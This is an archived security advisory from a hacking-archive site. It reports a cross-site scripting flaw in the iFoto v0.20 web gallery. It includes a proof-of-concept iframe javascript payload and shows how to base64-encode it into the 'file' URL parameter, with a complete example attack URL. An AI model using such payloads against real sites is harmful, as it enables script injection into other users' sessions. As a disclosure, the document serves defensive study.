AOH :: HP Unsorted I :: B06-2844.HTM

Ifoto v0.20-06/06/06



iFoto v0.20-06/06/06
iFoto v0.20-06/06/06



iFoto v0.20-06/06/06=0D
=0D
Homepage:=0D
http://ifoto.ireans.com/=0D 
=0D
Effected files:=0D
=0D
XSS Vulnerability:=0D
=0D
The dir path to show the image is base 64 encoded, so to attempt this XSS example we encode our codein base64.=0D
=0D
The code we'll be using is javascript in an iframe tag. [IFRAME SRC="javascript:alert('XSS');"][/IFRAME]=0D
=0D
http://www.example.com/?dir=Scene&file=PElGUkFNRSBTUkM9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpOyI+PC9JRlJBTUU+ 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.